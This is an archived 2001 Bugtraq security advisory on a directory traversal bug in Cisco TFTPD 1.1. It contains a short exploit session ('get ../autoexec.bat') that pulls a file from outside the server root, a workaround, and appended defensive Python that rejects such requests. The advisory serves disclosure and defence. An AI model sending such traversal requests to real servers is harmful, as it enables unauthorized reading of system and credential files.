Bugtraq mailing list archives
Cisco TFTPD 1.1 Vulnerability
From: "Siberian" <siberian () splashpages de>
Date: Mon, 18 Jun 2001 15:29:14 +0200
[Sentry Research Labs - ID0201061701]
(c) 2001 by www.sentry-labs.com

Note: This advisory is for information and educational purposes only! We are not responsible for any abuse or damage resulting from this information.

Author: Siberian
Topic: Security Bug in CISCO TFTPD server 1.1
Vendor Status: Informed (06/17/01)
Vendor URL: http://www.cisco.com/pcgi-bin/tablebuild.pl/tftp

Preamble:
This software is some days old and I do not know if it is still supported, but it is a serious issue which should be reported. The bug itself is very common.

Issue:
TFTPD is vulnerable to some kind of primitive directory traversal attack which allows a remote user to obtain any file from the target system.

Exploit (using tftp client (Linux)):

    tftp> connect target
    tftp> get ../autoexec.bat
    Recieved 218 bytes in 0.4 seconds
    tftpd> quit

Workaround:
Install your base directory at another partition or hard drive (not c:)
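The server-side check whose absence the advisory describes, as an added example that is not part of the original post and not Cisco's code: it parses a TFTP read request and refuses any filename that would leave the base directory. The function names, the base directory `/srv/tftp` and the sample packets are assumptions constructed for illustration.

```python
import struct
from pathlib import PurePosixPath

OP_RRQ = 1  # TFTP read-request opcode (RFC 1350)

class RequestRejected(Exception):
    """Raised when a request must not be served."""

def parse_rrq(packet: bytes) -> tuple:
    """Split an RRQ (2-byte opcode, filename NUL, mode NUL) into (filename, mode)."""
    if len(packet) < 4 or struct.unpack("!H", packet[:2])[0] != OP_RRQ:
        raise RequestRejected("not a read request")
    fields = packet[2:].split(b"\x00")
    if len(fields) < 3 or not fields[0] or not fields[1]:
        raise RequestRejected("malformed read request")
    try:
        return fields[0].decode("ascii"), fields[1].decode("ascii").lower()
    except UnicodeDecodeError:
        raise RequestRejected("non-ASCII field") from None

def confine(base: str, requested: str) -> str:
    """Map a requested name to a path under base, or raise RequestRejected."""
    name = requested.replace("\\", "/")  # Windows accepts both separators
    # Conservative: any colon is refused (drive letters such as c:).
    if name.startswith("/") or ":" in name:
        raise RequestRejected("absolute path or drive letter")
    parts = [p for p in name.split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        raise RequestRejected("path escapes base directory")
    return str(PurePosixPath(base, *parts))

def resolve_request(base: str, packet: bytes) -> str:
    """Full path the server may open for this packet, or raise."""
    filename, _mode = parse_rrq(packet)
    return confine(base, filename)

# Constructed sample packets: the request from the advisory and a normal one.
ADVISORY_RRQ = b"\x00\x01../autoexec.bat\x00octet\x00"
NORMAL_RRQ = b"\x00\x01images\\ios.bin\x00octet\x00"

if __name__ == "__main__":
    for pkt in (ADVISORY_RRQ, NORMAL_RRQ):
        try:
            print("serve:", resolve_request("/srv/tftp", pkt))
        except RequestRejected as exc:
            print("rejected:", exc)
```

The check is lexical only; a server that can follow symbolic links or junctions should also resolve the resulting path and confirm it is still under the base directory before opening it.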